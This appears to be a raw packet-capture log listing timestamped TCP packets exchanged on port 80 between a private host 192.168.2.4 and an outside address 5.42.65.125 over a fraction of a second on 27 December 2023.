Dec 27, 2023 18:12:25.197891951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.197906017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.197972059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198014975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198025942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198049068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198502064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198538065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198560953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198573112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198584080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198596001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198607922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198609114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198637962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198659897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198673964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198683977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198707104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198724985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198736906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198746920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198775053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198798895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198812962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198823929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198836088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.198848963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.198880911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.199407101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.199481964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.199518919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.199570894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.199604988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.199618101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.199651957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.260710001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260723114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260734081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260740995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260792017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.260828972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.260905027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260912895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260924101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260930061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260936022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260943890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260950089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260951996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.260957956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260965109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260971069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260977030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260981083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.260984898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.260998011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261007071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261029005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261084080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261178970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261217117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261219025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261224985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261231899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261239052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261245966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261257887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261267900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261275053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261279106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261281967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261313915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261317015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261321068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261332035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261338949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261358976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261394024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261400938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261408091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.261430025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.261454105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262032986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262089968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262121916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262129068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262136936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262168884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262239933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262248039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262259960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262267113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262273073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262295008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262307882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262326956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262334108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262346029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262353897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262360096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262367010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262372971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262373924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262387991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262396097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262408972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.262974977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262981892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.262994051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263025999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.263034105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263127089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263134003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263149977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263158083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263164043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263170958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263174057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.263178110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263185978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263200998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.263216972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.263242006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263250113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263262033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263271093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263283968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.263834000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263868093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263875008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263916016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.263940096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263947964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263982058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.263988018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.263995886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264033079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.264058113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264065981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264079094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264103889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.264123917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264132023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264142990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264149904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264157057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264178038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.264190912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.264200926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264209032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264219999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264247894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.264756918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264810085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.264847040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264856100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264889002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.264978886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264986038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264991999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.264998913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265006065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265012980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265018940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265018940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265027046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265038967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265038967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265045881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265053988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265069008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265072107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265079975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265086889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265093088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265095949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265113115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265827894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265836000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265841961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265853882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265876055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265891075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265898943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265911102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265918016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265928984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265934944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265970945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265970945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.265979052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.265990973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266017914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.266042948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266073942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.266177893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266474009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266482115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266489029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266513109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.266572952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266681910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266689062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266700983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266707897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266715050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266724110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.266726971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266735077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266747952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266756058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.266773939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.266798019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266805887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266818047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266824961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266832113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266838074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.266843081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.266870975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267400980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267426014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267432928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267465115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267469883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267504930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267524004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267585039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267591953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267600060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267630100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267652988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267661095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267673016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267678976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267695904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267695904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267704964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267714024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267738104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267740011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267746925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267754078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267760992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.267776012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.267793894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.268409014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268424034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268471003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268484116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.268507004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.268532991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268539906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268552065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268568993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268575907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268575907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.268593073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268599987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268609047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.268635035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.268659115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268672943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268685102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268692017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.268712044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.268733978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269155025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269223928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269258022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269373894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269381046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269387960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269393921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269401073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269408941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269414902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269421101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269428015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269434929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269434929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269445896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269471884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269473076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269479990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269491911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269498110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269505024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269516945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269524097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.269515991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269539118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.269556046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270158052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270165920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270173073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270180941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270193100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270195007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270205021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270215034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270232916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270267963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270277023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270283937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270291090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270296097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270302057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270303011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270315886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270320892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270344019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270369053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270389080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270396948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270435095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.270446062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270453930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270467043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.270493031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271117926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271142960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271153927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271233082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271239996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271246910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271254063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271260023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271269083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271280050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271286964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271292925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271300077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271301031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271318913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271326065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271332979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.271333933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.271342039 CET	80	49738	5.42.65.125	192.168.2.4
